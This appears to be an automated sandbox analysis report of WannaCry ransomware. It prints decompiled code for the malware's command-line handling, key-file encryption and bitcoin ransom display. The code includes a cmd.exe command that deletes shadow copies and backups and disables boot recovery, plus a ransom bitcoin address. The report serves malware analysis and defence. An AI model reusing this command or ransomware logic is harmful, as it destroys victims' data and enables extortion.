                                                      					E00401A10(_t167, 0);
                                                      					_t171 = _t171 + 0x30;
                                                      				}
                                                      				_t50 = E00402C40();
                                                      				__imp__#115(0x202,  &_v1424); // executed
                                                      				__imp____p___argc();
                                                      				if( *_t50 > 1) {
                                                      					_t168 = __imp____p___argv;
                                                      					_t140 = "fi";
                                                      					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      					while(1) {
                                                      						_t98 =  *_t161;
                                                      						_t60 = _t98;
                                                      						if(_t98 !=  *_t140) {
                                                      							break;
                                                      						}
                                                      						if(_t60 == 0) {
                                                      							L12:
                                                      							_t60 = 0;
                                                      						} else {
                                                      							_t136 =  *((intOrPtr*)(_t161 + 1));
                                                      							_t22 = _t140 + 1; // 0x31000069
                                                      							_t60 = _t136;
                                                      							if(_t136 !=  *_t22) {
                                                      								break;
                                                      							} else {
                                                      								_t161 = _t161 + 2;
                                                      								_t140 = _t140 + 2;
                                                      								if(_t60 != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L12;
                                                      								}
                                                      							}
                                                      						}
                                                      						L14:
                                                      						if(_t60 == 0) {
                                                      							E00407F80(_t90);
                                                      							ExitProcess(0);
                                                      						}
                                                      						_t141 = "co";
                                                      						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      						while(1) {
                                                      							_t99 =  *_t162;
                                                      							_t63 = _t99;
                                                      							if(_t99 !=  *_t141) {
                                                      								break;
                                                      							}
                                                      							if(_t63 == 0) {
                                                      								L21:
                                                      								_t63 = 0;
                                                      							} else {
                                                      								_t135 =  *((intOrPtr*)(_t162 + 1));
                                                      								_t25 = _t141 + 1; // 0x6600006f
                                                      								_t63 = _t135;
                                                      								if(_t135 !=  *_t25) {
                                                      									break;
                                                      								} else {
                                                      									_t162 = _t162 + 2;
                                                      									_t141 = _t141 + 2;
                                                      									if(_t63 != 0) {
                                                      										continue;
                                                      									} else {
                                                      										goto L21;
                                                      									}
                                                      								}
                                                      							}
                                                      							L23:
                                                      							if(_t63 == 0) {
                                                      								E004080C0(_t90);
                                                      								ExitProcess(0);
                                                      							}
                                                      							_t142 = "vs";
                                                      							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      							while(1) {
                                                      								_t100 =  *_t163;
                                                      								_t66 = _t100;
                                                      								if(_t100 !=  *_t142) {
                                                      									break;
                                                      								}
                                                      								if(_t66 == 0) {
                                                      									L30:
                                                      									_t66 = 0;
                                                      								} else {
                                                      									_t134 =  *((intOrPtr*)(_t163 + 1));
                                                      									_t28 = _t142 + 1; // 0x63000073
                                                      									_t66 = _t134;
                                                      									if(_t134 !=  *_t28) {
                                                      										break;
                                                      									} else {
                                                      										_t163 = _t163 + 2;
                                                      										_t142 = _t142 + 2;
                                                      										if(_t66 != 0) {
                                                      											continue;
                                                      										} else {
                                                      											goto L30;
                                                      										}
                                                      									}
                                                      								}
                                                      								L32:
                                                      								if(_t66 == 0) {
                                                      									Sleep(0x2710);
                                                      									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
                                                      									_t70 = "cmd.exe"; // 0x2e646d63
                                                      									_t105 =  *0x420fd4; // 0x657865
                                                      									_v2724 = _t70;
                                                      									_v2720 = _t105;
                                                      									if(E00401BB0() != 0) {
                                                      										_push( &_v2456);
                                                      										_push( &_v2724);
                                                      										sprintf( &_v1032, "%s %s");
                                                      										E00401A90( &_v1032, 0, 0);
                                                      									} else {
                                                      										E00401B50( &_v2724,  &_v2456, _t71);
                                                      									}
                                                      									ExitProcess(0);
                                                      								}
                                                      								goto L37;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L32;
                                                      						}
                                                      						asm("sbb eax, eax");
                                                      						asm("sbb eax, 0xffffffff");
                                                      						goto L23;
                                                      					}
                                                      					asm("sbb eax, eax");
                                                      					asm("sbb eax, 0xffffffff");
                                                      					goto L14;
                                                      				}
                                                      				L37:
                                                      				E00407E80();
                                                      				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0"); // executed
                                                      				E00406F80(_t90, _t201);
                                                      				E00406C20(_t90);
                                                      				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0); // executed
                                                      				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0); // executed
                                                      				 *0x42189c = _t90;
                                                      				return 1;
                                                      			}

                                                      APIs
                                                      • #4710.MFC42 ref: 004064DC
                                                      • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                                        • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                                        • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                        • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                        • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                        • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                                      • strrchr.MSVCRT ref: 00406554
                                                      • strrchr.MSVCRT ref: 00406564
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                                      • time.MSVCRT ref: 004065D1
                                                      • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                                      • __p___argv.MSVCRT ref: 0040661A
                                                      • ExitProcess.KERNEL32 ref: 0040665B
                                                      • __p___argv.MSVCRT ref: 00406666
                                                      • ExitProcess.KERNEL32 ref: 004066A7
                                                      • __p___argv.MSVCRT ref: 004066B2
                                                      • Sleep.KERNEL32(00002710), ref: 004066F3
                                                      • sprintf.MSVCRT ref: 0040676A
                                                      • ExitProcess.KERNEL32 ref: 00406786
                                                      • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                                      • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                                      Strings
                                                      • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                                      • Wana Decrypt0r 2.0, xrefs: 00406796
                                                      • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                                      • %s %s, xrefs: 00406764
                                                      • cmd.exe, xrefs: 0040671C
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                                      • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                                      • API String ID: 623806192-606506946
                                                      • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                                      • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 54%
                                                      			E004012E0(void* __ecx) {
                                                      				int _v4;
                                                      				intOrPtr _v12;
                                                      				void _v2059;
                                                      				void _v2060;
                                                      				void _v2192;
                                                      				void _v2196;
                                                      				intOrPtr _v2324;
                                                      				void _v2328;
                                                      				void _v2332;
                                                      				char _v2364;
                                                      				char _v2396;
                                                      				char _v2436;
                                                      				char _v2468;
                                                      				char _v2508;
                                                      				char _v2540;
                                                      				intOrPtr _t61;
                                                      				long _t65;
                                                      				struct _IO_FILE* _t68;
                                                      				struct _IO_FILE* _t76;
                                                      				struct _IO_FILE* _t83;
                                                      				int _t85;
                                                      				intOrPtr _t88;
                                                      				struct _IO_FILE* _t91;
                                                      				int _t97;
                                                      				void* _t100;
                                                      				char* _t123;
                                                      				void _t131;
                                                      				struct _IO_FILE* _t143;
                                                      				struct _IO_FILE* _t146;
                                                      				struct _IO_FILE* _t149;
                                                      				void* _t154;
                                                      				signed int _t156;
                                                      				signed int _t157;
                                                      				intOrPtr _t161;
                                                      				void* _t164;
                                                      				void* _t166;
                                                      				void* _t169;
                                                      				void* _t172;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004134A6);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t161;
                                                      				_t61 =  *0x42189c; // 0x19f608
                                                      				_push(_t156);
                                                      				_t154 = __ecx;
                                                      				_t3 = _t61 + 0x50c; // 0x19fb14
                                                      				_t100 = _t3;
                                                      				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
                                                      				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      				_t164 = _t161 - 0x9e0 + 0x18;
                                                      				_t65 = GetFileAttributesA( &_v2540); // executed
                                                      				_t157 = _t156 | 0xffffffff;
                                                      				if(_t65 == _t157) {
                                                      					L4:
                                                      					_v2196 = 0;
                                                      					memset( &_v2192, 0, 0x21 << 2);
                                                      					_t68 = fopen("00000000.res", "rb"); // executed
                                                      					_t143 = _t68;
                                                      					_t166 = _t164 + 0x14;
                                                      					__eflags = _t143;
                                                      					if(_t143 != 0) {
                                                      						fread( &_v2196, 0x88, 1, _t143); // executed
                                                      						fclose(_t143); // executed
                                                      						_v2332 = 0;
                                                      						memset( &_v2328, 0, 0x21 << 2);
                                                      						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      						_t76 = fopen( &_v2364, "rb"); // executed
                                                      						_t146 = _t76;
                                                      						_t169 = _t166 + 0x34;
                                                      						__eflags = _t146;
                                                      						if(_t146 != 0) {
                                                      							fread( &_v2332, 0x88, 1, _t146); // executed
                                                      							fclose(_t146);
                                                      							_t131 =  *0x421798; // 0x0
                                                      							_v2060 = _t131;
                                                      							memset( &_v2059, 0, 0x1ff << 2);
                                                      							asm("stosw");
                                                      							asm("stosb");
                                                      							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      							_t83 = fopen( &_v2396, "rb"); // executed
                                                      							_t149 = _t83;
                                                      							_t172 = _t169 + 0x34;
                                                      							__eflags = _t149;
                                                      							if(_t149 != 0) {
                                                      								_t85 = fread( &_v2060, 1, 0x800, _t149); // executed
                                                      								fclose(_t149);
                                                      								_t39 = _t100 + 0x242; // 0x19fd56
                                                      								_t40 = _t100 + 0x1de; // 0x19fcf2
                                                      								E0040BE90("s.wnry", _t40, _t39);
                                                      								_t88 =  *0x42189c; // 0x19f608
                                                      								_push( *((intOrPtr*)(_t154 + 0x20)));
                                                      								_push( &_v2540);
                                                      								_push( *((intOrPtr*)(_t88 + 0x818)));
                                                      								_push( *((intOrPtr*)(_t88 + 0x81c)));
                                                      								_t46 = _t100 + 0xb2; // 0x19fbc6
                                                      								_push(_t85);
                                                      								_push( &_v2060);
                                                      								_push(_v2324);
                                                      								_push( &_v2332);
                                                      								_push( &_v2196);
                                                      								_push(_t100 + 0xe4);
                                                      								_t91 = E0040C240( &_v2332, __eflags);
                                                      								_t172 = _t172 + 0x4c;
                                                      								_t83 = E0040C670();
                                                      								__eflags = _t91;
                                                      								if(_t91 >= 0) {
                                                      									E00404640( &_v2436);
                                                      									_v4 = 1;
                                                      									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
                                                      									__eflags = _t94;
                                                      									if(_t94 == 0) {
                                                      										 *(_t154 + 0xa8) = 1;
                                                      									} else {
                                                      										 *(_t154 + 0xa8) = 2;
                                                      									}
                                                      									_v4 = 0xffffffff;
                                                      									_t123 =  &_v2436;
                                                      									goto L15;
                                                      								}
                                                      							} else {
                                                      								 *(_t154 + 0xa8) = 0xffffffff;
                                                      							}
                                                      						} else {
                                                      							 *(_t154 + 0xa8) = 0xffffffff;
                                                      						}
                                                      					} else {
                                                      						 *(_t154 + 0xa8) = _t157;
                                                      					}
                                                      				} else {
                                                      					E00404640( &_v2508);
                                                      					_v4 = 0;
                                                      					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
                                                      						_t97 = DeleteFileA( &_v2540);
                                                      						_v4 = _t157;
                                                      						E00404690(_t97,  &_v2508);
                                                      						goto L4;
                                                      					} else {
                                                      						 *(_t154 + 0xa8) = 2;
                                                      						_v4 = _t157;
                                                      						_t123 =  &_v2508;
                                                      						L15:
                                                      						_t83 = E00404690(_t94, _t123);
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t83;
                                                      			}










































                                                      APIs
                                                      • sprintf.MSVCRT ref: 00401323
                                                      • sprintf.MSVCRT ref: 00401339
                                                      • GetFileAttributesA.KERNELBASE(?), ref: 00401343
                                                      • DeleteFileA.KERNEL32(?), ref: 0040139A
                                                      • fread.MSVCRT ref: 00401405
                                                      • fclose.MSVCRT ref: 00401408
                                                      • sprintf.MSVCRT ref: 00401440
                                                      • fopen.MSVCRT ref: 00401453
                                                        • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                                      • fopen.MSVCRT ref: 004013D5
                                                        • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                                        • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                                        • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                                      • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                                      • API String ID: 2787528210-4016014174
                                                      • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                                      • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 4076a0-4076d5 184 4076d9-407714 time 183->184 185 407716-40771c 184->185 186 40771e 184->186 187 407724-40773b 185->187 186->187 188 40775b 187->188 189 40773d-407745 187->189 192 40775f-407761 188->192 190 407747-40774d 189->190 191 40774f 189->191 195 407753-407755 190->195 191->195 193 407763-40776b 192->193 194 40776d 192->194 196 407771-407819 sprintf 193->196 194->196 195->192 197 407757-407759 195->197 198 407828-407832 196->198 199 40781b-407826 196->199 197->192 200 407833-40783c call 405180 198->200 199->200 203 407842-407892 SendMessageA * 2 #540 200->203 204 4076d7 200->204 205 4078a0-4078a8 203->205 206 407894-407896 203->206 204->184 207 4078aa-4078d9 _ftol #2818 * 2 205->207 208 4078db-40790e #2818 * 2 205->208 206->205 209 407911-40793e #3092 #6199 207->209 208->209 210 407990-4079bc #800 209->210 211 407940-407950 call 4079c0 209->211 211->210 214 407952-40798b InvalidateRect call 405920 * 2 211->214 214->210
                                                      C-Code - Quality: 63%
                                                      			E004076A0(void* __ecx) {
                                                      				intOrPtr _t89;
                                                      				char _t90;
                                                      				intOrPtr _t91;
                                                      				signed int _t94;
                                                      				intOrPtr _t98;
                                                      				signed int _t99;
                                                      				intOrPtr _t125;
                                                      				signed int _t133;
                                                      				void* _t136;
                                                      				intOrPtr _t139;
                                                      				signed int _t143;
                                                      				signed int _t147;
                                                      				void* _t148;
                                                      				intOrPtr _t161;
                                                      				signed int _t192;
                                                      				intOrPtr _t193;
                                                      				signed int _t196;
                                                      				signed int _t197;
                                                      				signed int _t198;
                                                      				intOrPtr _t200;
                                                      				intOrPtr _t202;
                                                      				void* _t204;
                                                      				intOrPtr _t206;
                                                      				void* _t207;
                                                      				void* _t208;
                                                      				void* _t209;
                                                      				void* _t210;
                                                      				void* _t211;
                                                      				void* _t213;
                                                      				long long _t225;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413EBB);
                                                      				_t89 =  *[fs:0x0];
                                                      				_push(_t89);
                                                      				 *[fs:0x0] = _t206;
                                                      				_t207 = _t206 - 0x8c;
                                                      				_t196 = 0;
                                                      				_t136 = __ecx;
                                                      				 *((intOrPtr*)(_t207 + 0x14)) = 0;
                                                      				 *((intOrPtr*)(_t207 + 0x18)) = 0;
                                                      				 *(_t207 + 0x1c) = 0;
                                                      				 *(_t207 + 0x20) = 0;
                                                      				_t204 = 0;
                                                      				L2:
                                                      				__imp__time(_t196);
                                                      				_t139 = M00421120; // 0x30303b30
                                                      				_t161 = _t89;
                                                      				_t90 = "00;00;00;00"; // 0x303b3030
                                                      				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
                                                      				 *(_t207 + 0x3c) = _t90;
                                                      				_t91 =  *0x421124; // 0x30303b
                                                      				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
                                                      				_t208 = _t207 + 4;
                                                      				 *(_t208 + 0x24) = _t196;
                                                      				memset(_t208 + 0x44, 0, 0x16 << 2);
                                                      				_t209 = _t208 + 0xc;
                                                      				if(_t204 != 0) {
                                                      					_t94 =  *(_t136 + 0x580);
                                                      				} else {
                                                      					_t94 =  *(_t136 + 0x57c);
                                                      				}
                                                      				_t98 =  *((intOrPtr*)(_t136 + 0x578));
                                                      				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
                                                      				if(_t161 <= _t98) {
                                                      					_t99 =  *(_t209 + 0x24);
                                                      				} else {
                                                      					_t133 = _t98 - _t161 + _t143;
                                                      					_t196 = _t133;
                                                      					if(_t196 <= 0) {
                                                      						_t99 =  *(_t209 + 0x24);
                                                      					} else {
                                                      						asm("cdq");
                                                      						_t99 = _t133 * 0x64 / _t143;
                                                      					}
                                                      					if(_t196 < 0) {
                                                      						_t196 = 0;
                                                      					}
                                                      				}
                                                      				if(_t204 != 0) {
                                                      					 *(_t209 + 0x20) = _t99;
                                                      				} else {
                                                      					 *(_t209 + 0x14) = _t196;
                                                      					 *(_t209 + 0x1c) = _t99;
                                                      				}
                                                      				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
                                                      				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
                                                      				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
                                                      				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
                                                      				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
                                                      				_t198 = _t197 + _t192 * 0xfffff1f0;
                                                      				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
                                                      				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
                                                      				_t207 = _t209 + 0x18;
                                                      				if(_t204 != 0) {
                                                      					_t148 = _t136 + 0x444;
                                                      					_push(_t207 + 0x38);
                                                      				} else {
                                                      					_push(_t207 + 0x38);
                                                      					_t148 = _t136 + 0x3c8;
                                                      				}
                                                      				_t89 = E00405180(_t148);
                                                      				_t204 = _t204 + 1;
                                                      				if(_t204 < 2) {
                                                      					_t196 = 0;
                                                      					goto L2;
                                                      				}
                                                      				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0); // executed
                                                      				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0); // executed
                                                      				L00412DA6();
                                                      				 *(_t207 + 0xa4) = 0;
                                                      				_t225 =  *((intOrPtr*)(_t136 + 0x584));
                                                      				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
                                                      					_t225 = _t225 + st0;
                                                      					 *(_t136 + 0x818) = 1;
                                                      				}
                                                      				_t124 =  *((intOrPtr*)(_t136 + 0x588));
                                                      				if(_t124 != 0) {
                                                      					 *((long long*)(_t207 + 0x14)) = _t225;
                                                      					_t200 =  *((intOrPtr*)(_t207 + 0x18));
                                                      					_t193 =  *((intOrPtr*)(_t207 + 0x14));
                                                      					_push(_t200);
                                                      					_push(_t193);
                                                      					_t124 = _t136 + 0x81c;
                                                      					_push("%.1f BTC");
                                                      					_push(_t136 + 0x81c);
                                                      					L00412E00();
                                                      					_t210 = _t207 + 0x10;
                                                      					_push(_t200);
                                                      					_push(_t193);
                                                      					_push("Send %.1f BTC to this address:");
                                                      					_push(_t210 + 0x10);
                                                      					L00412E00();
                                                      					_t211 = _t210 + 0x10;
                                                      				} else {
                                                      					L0041304A();
                                                      					_t202 = _t124;
                                                      					_push(_t202);
                                                      					_push("$%d");
                                                      					_push(_t136 + 0x81c);
                                                      					L00412E00();
                                                      					_t213 = _t207 + 0xc;
                                                      					_push(_t202);
                                                      					_push("Send $%d worth of bitcoin to this address:");
                                                      					_push(_t213 + 0x10);
                                                      					L00412E00();
                                                      					_t211 = _t213 + 0xc;
                                                      				}
                                                      				_push( *((intOrPtr*)(_t211 + 0x10)));
                                                      				_push(0x402);
                                                      				L00412CE6();
                                                      				L00412CE0(); // executed
                                                      				_t125 =  *((intOrPtr*)(_t136 + 0x824));
                                                      				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
                                                      				if(_t125 != 0x121284) {
                                                      					E004079C0(_t136);
                                                      					_t125 =  *((intOrPtr*)(_t211 + 0xac));
                                                      					if(_t125 != 0) {
                                                      						InvalidateRect( *(_t136 + 0x20), 0, 1);
                                                      						_push( *((intOrPtr*)(_t136 + 0x824)));
                                                      						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                                      						_push( *((intOrPtr*)(_t136 + 0x824)));
                                                      						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
                                                      				return _t125;
                                                      			}

                                                      APIs
                                                      • time.MSVCRT ref: 004076DA
                                                      • sprintf.MSVCRT ref: 0040780E
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                                      • #540.MFC42 ref: 00407876
                                                      • _ftol.MSVCRT ref: 004078AA
                                                      • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                                      • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                                      • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                                      • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                                      • #3092.MFC42(00000402,?), ref: 0040791D
                                                      • #6199.MFC42(00000402,?), ref: 00407924
                                                      • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                                      • #800.MFC42 ref: 0040799F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                                      • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                                      • API String ID: 993288296-3256873439
                                                      • Opcode ID: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                                      • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                                      • Opcode Fuzzy Hash: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                                      • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v44;
                                                      				struct HINSTANCE__* _t82;
                                                      				struct HICON__* _t83;
                                                      				intOrPtr _t119;
                                                      				intOrPtr _t124;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E0B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t124;
                                                      				_push(__ecx);
                                                      				_t119 = __ecx;
                                                      				_push(_a4);
                                                      				_push(0x66);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
                                                      				_v12 = 1;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
                                                      				_v12 = 2;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
                                                      				_v12 = 3;
                                                      				E004085C0(__ecx + 0x120);
                                                      				_v12 = 4;
                                                      				E004085C0(__ecx + 0x1a4);
                                                      				_v12 = 5;
                                                      				E00404090(__ecx + 0x228);
                                                      				_v12 = 6;
                                                      				E00404090(__ecx + 0x290);
                                                      				_v12 = 7;
                                                      				E00404090(__ecx + 0x2f8);
                                                      				_v12 = 8;
                                                      				E00404090(__ecx + 0x360);
                                                      				_v12 = 9;
                                                      				E00405000(__ecx + 0x3c8);
                                                      				_v12 = 0xa;
                                                      				E00405000(__ecx + 0x444);
